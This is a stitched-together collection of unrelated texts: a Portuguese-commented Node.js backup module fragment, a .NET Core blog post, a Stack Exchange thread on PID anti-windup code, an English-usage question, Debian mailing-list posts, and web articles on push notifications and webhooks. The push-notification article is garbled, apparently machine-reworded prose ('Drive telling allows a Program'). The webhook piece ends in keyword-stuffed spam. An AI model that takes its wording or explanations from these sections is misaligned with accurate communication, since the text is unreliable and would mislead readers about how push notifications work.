não foi informado.'); } // Se o nome do arquivo não foi passado o script montar um arquivo com o nome do banco if (!params.hasOwnProperty('hasFileNameOnPath') && !params.hasFileNameOnPath) { params.filePath = `${params.filePath}/${params.nomeBanco}.backup`; } sendMsg(params, "Tudo ok! Vamos iniciar a execução do procedimento!"); try { const result_backup = await dumpDataBase(params); sendMsg(params, "BACKUP EM EXECUÇÃO!"); sendMsg(params, "BACKUP CONCLUÍDO!!!") resolve(result_backup); } catch (error) { reject(error); }; }); } const sendMsg = (params, msg) => { params.msg && params.msg(msg); } module.exports = { uploadFile, backupDataBase };
STACK_EDU
To begin our little project, we need to create our initial project structure. Once that’s in place, we can create the first class from our application model - It’s frequently the case that a project directory accumulates addition stuff above and beyond the actual source code itself. For this reason, it’s my custom to carefully curate the folder structure of any project, so that things start off tidy and stay that way as the project evolves. For this project, I’m starting with two subfolders underneath the main project folder: src folder is for all the projects that make up deliverable components of our application. In this case, we’re starting with just a single project tests folder is for all our test projects, keeping the tests nicely segregated. You can see here the WordTutor.Core.Tests project, which will contain all the unit tests for the .vs folder is a working folder for Visual Studio Code, and the .git folder contains our git repository. Both can be ignored. One thing I’m really appreciating with .NET Core is the new project structure - all of the repetition and boilerplate from the old .csproj files has gone. Check it out - here’s the entire file for Here, we’re targetting .NET Standard 2.0 for maximum compatibility. Good practice is to target .NET Standard where possible - and the lower the standard you use, the wider the potential for reuse. Though, this is because lower versions are more restrictive, so it’s a balancing act. The project file for WordTutor.Core.Tests.csproj is a litte more complex, due to project and package references, but it is still far easier to read than the older style: This time, the project targets an actual runtime, necessary for execution of the unit tests. Neither project explicitly references any .cs source files - inclusion is now automatic, with a couple of benefits: there is a reduced chance for conflicts when adding additional source files, and this also encourages a tidy codebase where extraneous source files (debris left over from earlier efforts) is cleaned up as it’s made. Modelling a single word To encapsulate each individual spelling word, we have the immutable class VocabularlyWord. Here’s an abridged view of the important details: We begin with the essential properties for the word - how to spell it correctly, how to say it correctly (because sometimes a speech engine doesn’t say things the way we expect), and a sample phrase to give the word in context. For simplicity, we initialize a word with just a spelling and then we have some transformation methods that each return a new instance with the required change. This is a little bit wasteful, creating heap debris, but we’re looking at an interactive application here, not a server, so the simplicty of design likely worth the performance cost. The key that makes these transformation methods work is a private constructor that allows creating of a near-clone of an existing word: Each parameter has a null default, and if not provided, the matching property from original is used instead. This is possibly because null isn’t a permitted value for any of the properties. There’s nothing particularly novel about the implementations of GetHashCode(), but they’re included for completeness: The testing of VocabularyWord is pretty straightforward, so I’ll leave it to you to check out the code for yourself. In the next post, we’ll look at collecting many words together into a VocabularySet and explore how to transform an immutable collection.
OPCFW_CODE
Where to put the PID windup guard? Should I put a windup guard on each term of the PID, or just the I, or maybe the whole output? Windup is mostly an issue of the integral term. If you are getting windups from other terms, these are probably not designed properly. The I term only. Switch it's input to zero when it just enters saturation @Chu If you switch it's input to zero, it will never go down. @EugeneSh. I'm not sure if "windup" is the correct official term, but in some circumstances plant states can get out of hand. In my experience it's been mechanical assemblies driven by torquer motors, putting the traveler into a combination of velocity and position such that even at maximum braking torque it'll whack into a stop. @TimWescott I would call it a general instability. Can be caused by integrator windup of course. @EugeneSh. In every way that I've seen instability defined in academic works, what I described isn't instability. The system is perfectly stable (especially if the whole mechanism gets jammed up when the stop breaks off and sticks things up -- been there, done that), but it's severely misbehaving even so (unless your design intent is to break things). @EugeneSh. ... implicity: and back on again when its input is in the permitted region. Clearly it can't be 'off' for evermore. Integrator anti-windup is a measure you need to take because of output saturation or other limits in the system, and such limits are nonlinear behavior. When you start doing nonlinear control, a lot of the nice, clear, procedural things that we're taught in undergraduate control theory classes don't entirely apply. In general you should apply integrator anti-windup to just the integrator term, although you may also need to apply limiting to the output term before it's applied to a DAC (assuming you're doing the work in software). There are a lot of ways to do this. My preference is to either limit the integrator state to certain bounds by itself: // (Calculate integrator_state) if (integrator_state > integrator_max) {integrator_state = integrator_max;} if (integrator_state < integrator_min) {integrator_state = integrator_min;} Or to calculate a candidate output, then trim the integrator state: output_candidate = integrator_state + error * prop_gain; if (output_candidate > output_max) { integrator_state = output_max - error * prop_gain; } else if (output_candidate < output_min) { integrator_state = output_min - error * prop_gain; } // Re-calculate the actual output, possibly with a D term The method that @Chu mentions would work, if you remember to only apply it when the integrator is being pulled to excess, not pulled back (but my first method is equivalent). Another method that is used often is to hold the integrator term at zero when the error is large, then allow integrator action when the error gets below some threshold, or if you're doing a motion controller that knows when a "move" starts to set the integrator at zero at the start of a move and hold it there for some finite time. I'm not a big fan of either of those methods, but others are. Because you're venturing into nonlinear control, even if you're so far in the shallow end of the pool you can lie down without drowning, there are options on options on options, and there's no one right way to do it. Moreover, you can't find an answer by analysis -- you have to either implement the real system and give it a whirl, or make a simulation and try your algorithm out on that. I have opted for your first solution, and will try it out tomorrow. It's just a heater control with no safety critical features You may find this article useful. Note that the model of a heating system in there is completely fake; you probably don't want to use it in your work. What you'll find useful is the code, and the discussion of integrator windup. Tim's article has been fundamental to my understanding of controls. It is well worth the short read and will help out immensely! I highly recommend it. Thank you @TimWescott! @DrewFowler: I thought I recognized that code. The young Padawan meets his master. Windup guard is typically referred to as the protector of the integral term in order that it will not accumulate continually. The controller can overshoot significantly and will continue to overshoot with the integral continuing to grow. Therefore, the windup guard is just the integral term. As this term can "windup" and keep growing. But, the output of a PID can/should be limited on the output as well. For example the following code calculates the integral term and then limits it according to a set value. It also limits the output of the controller, but according to a different limiting term. void PID_Compute(PID *pid) { //Find all error variables pid->lastError = pid->error; pid->error = pid->setpoint - pid->input; pid->derivative = pid->error - pid->lastError; pid->integral += pid->Ki * pid->error; //Anti-integral Windup if(pid->integral > pid->IntegralLimit){ pid->integral = pid->IntegralLimit; } else if(pid->integral < -pid->IntegralLimit){ pid->integral = -pid->IntegralLimit; } //Calculate PID pid->output = (pid->Kp*pid->error) + (pid->integral) + (pid->Kd * pid->derivative); //Set limits if(pid->output > pid->Outmax){ pid->output = pid->Outmax; } else if(pid->output < pid->Outmin){ pid->output = pid->Outmin; } } For anything pertaining to writing or understanding a PID controller, refer to Tim Wescott's article. As others have already said, windup is only a problem for the I term. Where I differ from almost everything else that I've seen, is that I don't like to arbitrarily limit my I. I want it to be able to saturate the output no matter what it takes to do that, but there's no point in going beyond that. So my limits are floating, based on the final output. So I use a bigger datatype to hold the output than what I actually need, so I can detect out-of-range and clamp it. Then as part of that clamp, I also unwind the I. For one project, I actually back-calculated what it should have been to saturate exactly, but for another, I just switched on an exponential decay: I_acc += Error; //other code here if (OUTPUT_OUT_OF_RANGE()) { CLAMP_OUTPUT(); //anti_windup I_acc -= (I_acc >> 2); }
STACK_EXCHANGE
Enjoys his fair share to work hard and smart to meet commitments Received a resume lately. One of the sentence, in summary section, doesn't look right to me. It may be not a very obvious mistake, or may not be a mistake at all. But I can't say anything for sure, as I am not a native speaker and neither I find myself eloquent in writing English. .... blah blah. A reliable team member who gets work done and enjoys his fair share to work hard and smart to meet commitments. blah blah .... Now, if you tell me to correct it, because I think it's not well written. Then I would make something like below, using the same words without trying to make it spiffy, .... blah blah. A reliable team member -- very smart to meet commitments, who gets work done and enjoys his fair share in working hard. blah blah .... What do you folks think? Is there something wrong with the original sentence structure? I made a few edits to the question; EL&U should not be used for questions on how to improve one's English (see the FAQ). However, since it did contain real question about a certain grammatical construction, I am leaving the question open with some extraneous stuff edited out. Here's my suggestion: So and so is a reliable team member and does his fair share of hard work to meet commitments. I haven't used 'gets work done' because 'reliable' carries the connotation that he will get the job done. Others may disagree, saying that reliable means other things, like getting to work on time, etc. However, you can still include that phrase if you want to. If you want to include 'smart' in there, you might have to rephrase things because in English usage people usually work hard or work smart; 'working smart' carries the connotation of not having to work too hard to achieve something. So, you could write: So and so is a reliable team member who works hard and has shown aptitude and diligence in meeting commitments. Aptitude replaces smart and diligence replaces hard(-working). The above sentence is more formal (or stuffy), depending on how you see it. If it's not quite what you're looking for, then how about: So and so is a reliable team member who works hard, works smart and meets commitments. Or: So and so is a reliable team member who works both hard and smart to meet commitments. The bottom line is that your example can be rewritten in several ways, but perhaps to simplify matters, think about what you want to say and the tone you wish to convey it in, then write the sentence as correctly as you can. It's always best to write simply, after which you can embellish your sentence, if you wish. Thanks and hope this helps. 'Deadlines' and 'objectives' are better word choices than 'commitments', as mentioned by smirkingman. Without more info, 'commitments' sounds more like things you do for your family. A reliable team member who gets work done and enjoys his fair share to work hard and smart to meet commitments. This sounds terribly like a direct translation from another language. It bothers me on several counts: "his fair share to work hard" should be something like "his fair share of hard work" "and smart to meet commitments" (methinks Google Translate?). Does he smart (go red in the face) when he meets commitments? Is he smart (clever) enough to meet commitments? Did he smartly (quickly) meet (encounter) a commitment on his way to work? Or, almost ridiculously, he's smart (clever) enough to meet (face to face) commitments rather than delivering what's promised? Stringing more than two phrases together with ANDs (and enjoys, and smart) is clumsy. We all get the jist of 'meeting a commitment', but here commitment is nothing but waffle-speak for a deadline or an objective. Let's analyse what he's trying to say: He's a reliable team player He works hard and takes his fair share of the workload He meets his commitments (in some, yet to be understood, positive fashion) From which we can cobble something more concise and distinctly more palatable, for example: John is a reliable, hard-working team player who consistently meets his objectives. Small correction: "what we think he's trying to say" (we because I do think so too). We don't know that's what he's trying to say. Thanks, smirkingman, for all your opinions and suggestions. +1 Two things: enjoys his fair share to work hard sounds weird to me; I expect people to do their fair share the sentence doesn't have a verb (nominal sentence); while it's becoming more common, especially in informal writing, I don't consider it writing good style unless you're describing a process of thoughts, for example.
STACK_EXCHANGE
Re: What is pbbuttonsd used for nowadays? On 31. jan.. 2009, at 22.20, Stefan Monnier <firstname.lastname@example.org> E.g. is pbbuttonsd's cpu throttling similar to what cpufreqd/ do or does it work differently? What about the comparison with the kernel's "ondemand" scaling governor (tho this doesn't work on my it's maybe not a relevant question)? What happens if two of them installed at the same time? Non issue, leave it to the kernel I do not know what you mean. Are you saying "pbbuttonsd's cpu throttling functionality is useless, use the `ondemand' governor to the kernel take care of it"? No, not useless. Still i like easy and functions further up the tree if you catch my drift If so, it doesn't apply to the G4 since the G4 isn't able to switch frequency quickly enough for the kernel's scaling governors to be Ok, i'll be sure to let my computer know that. How does pbbuttonsd's hard-disk power save compare to the usual Also a kernel thingy Actually, not only: the kernel provides ways to save power, but how when to use them is generally under the control of userspace tools. You sure want to confuse the discussion with minor importances. Want to discuss X' mouse handling to? But IIUC you're saying that pbbuttonsd's hard-disk power saving functionality is made redundant by laptop-mode? No. I still like easy and functions to be handeled as early as possible making me run less annoying program and daemons Is it also the case that pbbuttonsd makes laptop-mode redundant? Now you are fetching straws to discuss boring subjects For someone like myself who uses Debian on a variety of platforms, For the sake of EASY handling of button functions... There shines help me figure out how best to adapt my generic Debian config. I believe you. But I don't know what "buttons" you're talking do I know what is their "function". And I'm not even sure what you by "EASY" (tho I guess you mean "without any manual configration"). Manual configurations is ok. Still, changing the light with proc or whatever with numbers 1-255 is kinda stupid. Btw now you come out as somewhat a bit dense. You've read the posts on this current topic you started? Apt-get install pbbuttonsd once is easy and every little marking and symbol on my keyboard works
OPCFW_CODE
Re: Initial Load, X Issues don't use dselect. You can use dpkg. Go to the path where your .deb resides and do dpkg -i name_of_the_deb_package.deb >but it doesnt seem to support my newer TNT2. Trouble-free or work-free supporting depends of what version of Debian you're using, if old or new. People from NVIDIA (TNT) have provided some stuff for GNU/Linux in their homepage, near the M$ Win drivers. Go and take a look there, it can be Other questions... Don't know (also Debian and GNU/L newbie). Hope you convert to Debian and enjoy it. Hope that helps, At 16.48 7/7/00 -0400, Ethan Pierce ha escrit: >Greetings all, I have just installed Debian via the apt method. Im not even sure what this did but it seemed to go right into the compilation where dselect from the cdrom was near impossible for me to figure out. Anyhow, while it was compiling it kept asking me if I wanted this WM or that, I was waiting for enlightenment to show up so I kept saying NO (apparently E doesnt come with 2.1). So now everything is installed, im on the net and in a console. >A few questions: >1) how should I go about getting X working? I understand how to use xf86config, but it doesnt seem to support my newer TNT2. I have the Xfree86 4.0 DEB package and I definately want to install that. Where do I put it to have dselect recognize it. Or should I compilie X4.0 from source. >2) How do I get my window manager working when/if I get X running correctly? Is it just a simple matter of editing .xinitrc in homedir? >3) I want enlightenment WM, I used it b4 in mandrake, but could never compile it from CVS because of the way RPMs are strewn about the system in mandrake. Ive been told that getting E through CVS in Debian was a snap. Any tips on this? >4) Lastly, I want to upgrade the kernel. Should I do that first before anything else? I am familiar with this process. >Thanks for your help guys, Im coming to Debian because it was highly recommended to me and well maintained. I dislike the way Mandrake sets files and packages about the system in disorganization. Please help me convert to Debian. Appreciations, Ethan \______| els fills abandonats |_______/ Do You Yahoo!? Achetez, vendez! À votre prix! Sur http://encheres.yahoo.fr
OPCFW_CODE
Drive telling allows a Program to inform its consumers of new events or messages without needing to really open it, similar to the way the TextMessage is likely to create a sound and pop up onto your phone’s display. This is among the great manners for Apps to interact with users in your desktop computer. In addition to compelling messages to the screen, It allows Apps to produce a few or some’badge’ on the Program’s icon e.g. the email icon will reveal the number five when you will find just five unread messages. Here is the perfect use instance with this: let’s suppose you’re enjoying chess by means of your pal on line. While you’re in the App, your companion’s moves may show up around the board straight away when you switch to some other App- e.g. to read email even though your good pal determines where you can move-the App requires a means to inform you when your pal creates a transfer. Here are some tips Which Could assist you working with push alarms: It’s mandatory for a program to enroll inside the server (e.g. APNS to get i-OS, GCM server for Android, MPNS to get both Windows and so forth ) in order to receive the notifications. Then it can pass into its provider a device token it receives out of the os. These are able to be quite a message, an forthcoming calendar occasion, or fresh data over a remote server. They are able to display an alert communication plus else they are able to rename the program . They’re also able to play with a sound whenever the alert or badge number is shown. Choose the sort in accordance with your need. Refrain from using multiple alarms to get similar activities (e.g. in a conversation room software, an individual might desire the telling just as soon as the dialog has been established. It is not necessary to present the notification whenever a message has been acquired ). Be careful with the excessive usage of Android drive notifications as replicated will Lead to spamming that may result in the user unsubscribing from your application Always select a service provider who provides cross platform service for your program’s notifications. This Will Cut the attempt in Determining the Kind of devices App consumers are using e.g. in case your program Is Operating on Two platforms such as android and windows, and after which the supplier may Offer you a Solution to send the messages into either platforms from one api phone A Couple of restrictions which you should Remember Some service providers, apparatus aren’t capable to deal with numerous drive notifications inside a single App. Inside this event a great deal of drive messages delivered App will be queued, and just the modern telling will be upward on the screen. For more information use this website – push notification ad network Shipping of push notifications is not ensured. Push Notification services includes a suggestions service which the host (APNs) always upgrades with a per-application list of apparatus for which there clearly were failed-delivery efforts. So using drive notification to get realtime software isn’t viable. I think the available rate for business apps is higher, as a company owner when you send out a push notification for the visitors. Your web visitors are considerably more targeted and it is possible to be distinct regarding exactly that which your own web visitors may require to read, like a exceptional purchase. From my experience with programs that I have assembled, the proportion of downloads are somewhat high when you give a coupon or reduction. This will be advice I like to show business owners as it exhibits what the client is searching for. Additionally, I found down that loaders don’t value the look and texture about the organization. They desire a quick way to predict and also a rapid means to be aware of the positioning. Here is what programs can offer.
OPCFW_CODE
Consider consolidating per-restore logs into a single file? (Similarly for backups) Right now, for restores, we log: validation errors into the restore API object (.status.validationErrors) info-level logs to -logs.gz in object storage, using logrus warnings/errors to -results.gz in object storage, as JSON We follow a similar pattern for backups, except we don't have the third item (yet). I wonder whether it would make sense to consolidate this down into just a single per-backup/per-restore log file (e.g. -logs.gz). Since we're now using logrus, we have the ability to use differing log levels as well as other structured logging fields to differentiate between different types of log output. The main benefit that I see of consolidating is that a user now only needs to look in a single place for the full set of results from a backup or restore. So, for a restore: We could retain the view that we currently provide in ark restore describe by adding logic to that command to parse the log file and separate out the log statements into different sections within the command output. Interested to see if other folks think this makes sense/is useful. @jbeda this is an item we'd like to discuss soon My read on this would be that this is an internal or developer focused improvement. Would this add any value for end-users? I'd also like to raise a discussion on prioritization for this. @ncdc I see you made it P1 - would love to know more, or we can discuss in the context of the larger 1.0 roadmap planning. Would this add any value for end-users? Currently, end users asking for help have to look in the 3 locations specified to see the full picture of what happened if a backup or restore didn't work as expected, so I'd say it does have end user impact. Ah - I understand now. Thanks @nrb. So I'm lumping this under UX / debuggability. Related to #305 Summarizing discussion from above, here's my straw-man proposal: Backups and Restores use the following phases: New: the object has not yet been processed by the Ark server Processing: the object is currently being processed by the Ark server Processed: the object has been processed by the Ark server and has reached a terminal state (e.g. for backups, everything that could be backed up was backed up and the tarball/etc have uploaded to object storage; for restores, everything that could be restored was restored and the log has been uploaded to object storage) Failed: there was a fatal error preventing the object from reaching a normal terminal state (e.g. there was an error uploading the tarball/logs to object storage) WarningCount and ErrorCount fields are added to the status for both Backups and Restores to store counts of the warnings/errors logged during the backup/restore; backups and restores can now be displayed in ark backup get / ark restore get as e.g. Processed (2 warnings, 1 error) ark backup describe and ark restore describe display warning/error counts by default. If --details is specified, the per-item log is fetched from backup storage, and the warning/error lines are displayed as part of the output For both Backups and Restores, validation errors (i.e. .status.validationErrors) go away; any information currently reported as a validation error gets logged at error level to the per-item log file, and instead of using the FailedValidation phase, objects will be Processed with >0 errors. FailureReason field is added to the status for both Backups and Restores, to provide the user information about why their backup/restore is Failed rather than Processed (this is particularly useful for when the log fails to upload, and the only other place that errors can be logged currently is to the server log) All comments welcome -- just wanted to get a draft proposal out! This proposal makes sense to me. I think FailureReason for cases where the failure is to upload a log makes a lot of sense in terms of visibility. One thing I'm still thinking about is how to make it more clear that a backup that's failed validation has no data uploaded to object storage. E.g. a backup with a single validation error that therefore never backed up anything might be displayed as Processed (1 error) which could be the same as for a full-cluster backup that got one error backing up a single PV. We could: keep FailedValidation as a phase FailedValidation -> Failed, rather than Processed store a count of objects backed up as a summary stat on the API object and display it, e.g. Processed (0 items backed up, 1 error) something else FWIW - was thinking about https://github.com/heptio/velero/issues/286#issuecomment-440386348 again, and I think FailedValidation should become Failed (rather than processed). So, after starting to dig into this, I realized that this could turn into a pretty big ugly PR if tackled wholesale. I thought about how to break it down and here's what I came up with: For v1.0: [ ] move RestoreResult https://github.com/heptio/velero/blob/master/pkg/apis/velero/v1/restore.go#L118 out of the API package, since it's not actually part of the API, just a struct that gets JSON'ed and uploaded to object storage. This frees us up to drop it in a 1.x release. [ ] in velero restore describe, show warning/error counts right next to the status (so it'd show something like Phase: Completed (2 errors, 1 warning). Possibly also update velero restore get output to combine the phase/warnings/errors columns. [ ] add Warnings and Errors count fields to Backup's status to be consistent with Restores. [ ] make Backups consistent with Restores re: whether it ends as Failed or Completed. Failed should mean "failed to start" or "failed to upload tarball", whereas Completed (with errors) would mean individual items failed to backup. For v1.x: [ ] enhance velero backup describe or velero backup logs to more easily view errors, by adding filtering, grouping, formatting. Do this for backups first, since we already have leveled logs. [ ] drop the RestoreResult type for restores, move warning/error reporting into the restore log, and enable them to be shown in the same way as for Backups For v2.0: [ ] Once all of the above is working well, drop the ValidationErrors field on Backups/Restores (these will go into the log as regular errors), and drop the FailedValidation phase (this will become Failed). @nrb @carlisia does this seem reasonable? I tried to focus v1.0 work on (a) make things consistent between Backups/Restores so it's more obvious for the user, and (b) set us up for making additional changes later. @nrb @carlisia would appreciate any input you have on the above - I'd like to get started on this soon. I'll look at it in a little bit. You didn't mention FailureReason , does this no longer make sense to add? It sounded like a good idea. I like this proposal as is. I especially like rolling the FailedValidation into the Failed phase. Ultimately, I think the priority should be to have 1 phase that unequivocally means "success". If this is Processed, then we definitely should go for "FailedValidation -> Failed, rather than Processed". And I don't think it hurts if this change gets postponed to v2.0. I'm confused about this Completed (2 errors, 1 warning). How does Phase: Completed relate to Phase: Processed? I found completed in the code but having trouble finding processed. In addition, in the code it says BackupPhaseCompleted means the backup has run successfully without errors. but your proposal says to display in the describe: Phase: Completed (2 errors, 1 warning). If there are errors, how could it be completed? I'm asking to make sure we don't have discrepancy in meaning with our phases but also for my understanding. Other then that tho, I like it that you broke out part of this effort into future releases, that is great. 👍 For the v1.0 milestone, how does the user then get this combined stream? velero restore logs? So describe only displays counts and no other information? Let's chat about this in person next week, I think some discussion will be helpful. @carlisia @nrb responses to your comments. We should still discuss in person. You didn't mention FailureReason , does this no longer make sense to add? It sounded like a good idea. Yeah, this still makes sense, and can be added for v1.0. For the v1.0 milestone, how does the user then get this combined stream? velero restore logs? So describe only displays counts and no other information? Based on the latest proposal, not much changes for v1.0 in terms of seeing the results. velero restore logs plus velero restore describe would still be used to see the overall picture. The work to combine into a single stream would be done in a v1.x. Per https://github.com/heptio/velero/issues/286#issuecomment-479014480, the main work item that I actually want to tackle for v1.0 is deciding on the semantics of Completed vs. Failed, and then making it consistent across backups + restores. Specifically: does Completed (or Processed) mean "Completed with no errors"? Or can it mean "Completed with some errors backing up/restoring individual items"? conversely, does Failed mean "There were >0 errors encountered during backup/restore"? Or does it mean "Fatal error, such as unable to upload/download backup tarball"? We could also decide to go to Completed, CompletedWithErrors, and Failed as the phase set, to differentiate. I like Failed as "fatal error, couldn't perform a key operation to start the restore," and CompletedWithErrors or PartialCompletion for a restore where some resources can't be restored. The overlap I see there is if we failed to restore anything into k8s, but velero operations had no error, is that Failed, or CompletedWithErrors/PartialCompletion? If number of artifacts restore == 0, I could see how the latter would be confusing. For me it hinges on how useful the output of a CompletedWithErrors would be. If 100% unusable, then it should be a plain Failed. I suspect there's a spectrum and maybe we can't even detect that.
GITHUB_ARCHIVE
Is it haram to hang duas, or an ayah, on the bathroom wall (i.e. in a picture frame)? When entering restroom facilities, it is nice to be reminded of the many sunnahs that relate to using the bathroom, hygiene, etc. But is it haram to have a framed dua or Quranic verse hanging on the wall (in a picture frame)? Thank you in advance. Wasalaam. Can you elaborate on what you exactly mean by a 'hanging a prayer'? I.e. a framed Arabic prayer I guess that means "hanging a Qur'an verse in Arabic" or "hanging a dua in Arabic"; it doesn't make sense to "hang a prayer" (which is an action involving recitation, prostration, etc.). @RebeccaJ.Stones I edited it. Sorry I was not clear. Let me know if I should edit it any further. It would be better if one would learn the prayers (duas) by heart and practice the sunnah. Over time it will become second nature and you would need no external form of reminding. Below is a Hadith that prohibited prayer (salaat) in a bathroom but the classification is Daif. It was narrated that Ibn 'Umar said: "Allah's Messenger prohibited prayer from being performed in seven places: The garbage dump, the slaughtering area, the graveyard, the commonly used road, the bathroom, in the area that camels rest at, and above the Ka'bah." Sunan Ibn Majah 746 Also as per Fathul Bari vol.1 pg.197; Daarul Qur’aan If a person forgets to read the Du’aa before entering the toilet, then the Du’aa should be read in one’s heart, not on the tongue. However, if the toilet and bathroom are combined, then before entering the actual place of toilet, one may read the Du’aa verbally, on condition one is not unclothed. I don't see how this answers the question "is it haram", I can only see how it answers "is it the most recommended course of action". @G.Bach honestly you are correct. I accepted the answer because Ahmed put alot of effort into it. Perhaps that was not the wisest decision. Ahmed, would you be able to confirm this as halal or haram? Jazak. Hanging ayahs or duas on the walls in general is contrary to the practice of the Prophet (SAW) and the Khulafaa’ al-Raashidin (RA), who never did such a thing. The best way is to follow them and not to introduce bid‘ah. Since it was never a practice there are not many Hadiths that talk on the subject directly. You can further deduce the ijtehad on the practice w.r.t washroom. Please also visit this link which has a response by Sheikh Muhammed Salih Al-Munajjid : https://islamqa.info/en/254 ... And Allah knows best and we pray to Him to guide us to the straight path. Ameen. Thank you Ahmed. I’m assuming this does not apply to the masaajid, as they are commonly decorated internally with duas and verses. Wasalaam. The moderators on this forum advise us against asking multiple questions in a single query and also tend to move comments to the chat section at times. Hence, I'd advice you to post that as a separate question to help other members too :) @Ahmed my question asks about bathroom walls specifically. Your comment above refers to walls in general, which shifts the conversation. @Ahmed "Hanging ayahs or duas on the walls in general is contrary to the practice of the Prophet (SAW) and the Khulafaa’ al-Raashidin (RA), who never did such a thing." So is driving a car, or drinking chai latte. That doesn't show it's haram. @G. Bach In Islam, bidah refers to innovation in religious matters. @Ahmed Your answer says nothing about bidah; if your answer is "it's haram because it's bidah", your answer should reflect that. @G.Bach One cannot label a practice that was non-existent at the Prophet's time as either Halal or Haram if not alluded to by the Quran or the Prophet. The ulema through ijtehad will classify such practices as either mustahab, mubah or makruh. @G.Bach In my answer, I have provided references that state that it is mustahab (recommended) to read the duas before entering the toilet.Also in my earlier comment I have provided a link that refers to a fatwa by Shiekh AL-Munajid w.r.t hanging quranic verses on walls in general. It can be deduced that if it is considered makruh to hang these in a normal place of stay like the bedroom or hall which are considered clean and pure, then it would be more disliked to the same in a toilet which are relatively unclean and impure. @G.Bach If you have a different opinion, please do feel free to enlighten us. We all learn through sharing on this forum. :-)
STACK_EXCHANGE
How To Create Webhook – Product Automation Platform See how codeless automation works with over 5,000 apps Secure features trusted by over 2 million businesses Build flexible workflows App integration Explore 5,000+ app connections Early Trial New products Try sending data first. On Demand Tables Beta Code-free Database Built-in Zap Connection Sales Navigation App Integration Navigation Role Marketing Business Owner IT Sales Operations Workflow Lead Management Customer Communication Internal Process Data Management Small Business Startups by Company Size Small Business Startups Small Business Resources and Support Roles Marketing Business Owner IT Sales Operations More Learn Blog University Webinars Customer Stories Help Center Community Experts Contact Us Support Team & Company Pricing I saw the webhook mentioned in the app settings and wondered if it’s something I should use. In short, the answer is probably yes. How To Create Webhook Webhooks are one way that applications can send automated messages or information to other applications. How PayPal notifies your accounting app when a customer pays, how Twilio calls your number, and how WooCommerce notifies you of a new order in Slack. Learn By Example: Building Your First Shopify Webhook It’s a simple way for your online accounts to “talk” to each other and automatically notify you when something new happens. In most cases, you need to know how to use webhooks to automatically push data from one application to another. Learn how to talk with webhooks in detail and let your favorite apps talk to each other. There are two ways apps can communicate with each other to exchange information: polls and webhooks. As one of our customer champion friends explained: A survey is like knocking on your friend’s door and asking if they have sugar (also known as information), but you have to go and ask for it whenever you want. A webhook is like throwing a bag of sugar at home when someone buys it. No need to request. Automatically push whenever a request is received. Webhooks are automated messages sent by apps when something happens. They have a message or payment and are sent to a unique URL, which is essentially the phone number or address of the app. Webhooks are almost always faster than polling and require less user action. Events & Webhook Overview It’s almost like an SMS notification. Let’s say your bank sends you an SMS when you make a new purchase. You already gave the bank your phone number, so the bank knew where to send the message. Enter “I spent $10 at NewStore” and send it to your phone number. Take a look at the example message for a new order. Bob opened his store’s website, put a $10 bill into his shopping cart, and checked out. Boom, what happened and the app is about to tell you. Time for a webhook. Wait: Who is the app calling? Just like a bank needs to give you a phone number before sending a text message, with a webhook you need to tell the app you want the original app (in this case the ecommerce store, in this case the app’s webhook URL). The data to send. Let’s say you want to create an invoice for this new order. The application that generates this invoice is on the receiving end. An application that requires order data. Create A Discord Webhook In Python For A Bot First, open the Invoices app, create an invoice template and copy the webhook URL (eg yourapp.com/data/12345). Then open your ecommerce store app and add that URL to your webhook settings. That URL is basically the phone number of the invoicing app. If another application pings that URL (or typed the URL into the browser’s address bar), the application will see someone trying to send data to that URL. Likes Back to Order I know I’ve received an order from an ecommerce store and need to send details to yourapp.com/data/12345. Writes the sequence in sequential form. The simplest of these formats is called “form encoding”. In other words, the customer’s order will look like this: Now we need to send a message to the ecommerce store. The simplest way to send data to a webhook URL is with an HTTP GET request. It literally means appending data to a URL and pinging the URL (or typing it into your browser’s address bar). Just like you can open an info page by typing , your applications can send messages to each other by tagging additional text with a question mark at the end of the website address. Here is the complete GET request for the order. Setting Up Webhooks Deep inside the Invoices app, “Your mail has arrived!” A new invoice is created for Bob’s $10 paper order and the application is launched. A working webhook. Remember when you had to check your email to see if there were any new messages? And remember how to mitigate push emails (“You have mail!”)? This is the webhook for your app. No more checking for new information. Instead, you can push data to each other when something happens, so you don’t waste time checking and waiting. → Ready to use webhooks? Skip to the boring details, or learn more about the most common terms used with webhooks. This is a simple version. Technically, a webhook is “a custom call made over HTTP” according to Jeff Lindsay, one of the first people to conceptualize a webhook. Webhooks are data and executable commands sent from one application to another in XML, JSON, or format-encoded serialized format over HTTP via the command line on a computer. A webhook is called a webhook because it is a software hook (an activity that runs when something happens). And it is usually protected through obfuscation. Each user of your application gets a unique, random URL to which to send webhook data. However, you can optionally protect it with a key or signature. Incoming Webhook Integration Webhooks are commonly used to connect two different applications. When an event occurs in the trigger app, serialize the data for that event and send it to the action app as a webhook URL (the action you want to base the data on in your first app). Action applications can then send a callback, often with an HTTP status code. Webhooks are similar to APIs, but simpler. An API is a complete language for applications that have functions or calls to add, edit, and retrieve data. The difference is that you have to do the work yourself using the API. When you build an app that uses APIs to connect to other apps, your app must have a way for other apps to request new data when needed. Webhooks, on the other hand, are intended for a specific part of the application and are automated. You can only have webhooks for new contacts, and when a new contact is added, the app automatically pushes data to the webhook URL of another app. It’s a simple one-to-one connection that works automatically. Know the terminology, understand how apps can send messages to each other using webhooks, and understand what serial data means. You are talking about a webhook. Time to use. The best way to understand how webhooks work is to test them and create your own webhooks to see if they work. Alternatively, you can drop the webhook URL into the app to share data. After all, you don’t need to know how to create a webhook to use it. How To Create A Reporting Dashboard With Webhooks The fastest way to learn is to experiment, and it’s best to experiment with the unbreakable. Webhook has two great tools: RequestBin (owned by Pipedream) and Postman. RequestBin allows you to construct a webhook URL and send data to see how it is recognized. Go to RequestBin, click Create RequestBin and copy the provided URL. You must have a Pipedream account (created with Google or GitHub) to view and use the URL. Now serialize some data in form encoding style or just copy the example form script above. Open a new tab, paste the RequestBin URL into the URL bar and type ? Finally, paste the serial data. It ends up like this: . Refresh the RequestBin tab and you will see the data listed below as shown in the screenshot above. Cara Membuat Webhook Di Utas [advance] If you prefer, you can use RequestBin’s sample code to send POST requests from your terminal or from your own application code. It’s a bit more complicated, but provides a way to use JSON or XML encoding. Or use another app. The Postman application allows you to make custom HTTP requests to easily send custom data to a webhook URL. After entering the URL, select the HTTP request method to use (GET, POST, PUT, etc.) and add the body data. You can send more detailed requests to webhook URLs without much code. Testing webhooks and manually serializing data is as tricky as copying and pasting data from your application. We bypass both and let the apps communicate with each other. We will use the WordPress-based form tool Gravity Forms and the document template builder app WebMerge as examples. How Do I Configure Chargebee’s Webhook In Stripe? How to make a webhook, how to create llc, how to create paystubs, how to create invoices, how to create ad, how to create prototype, create webhook url, 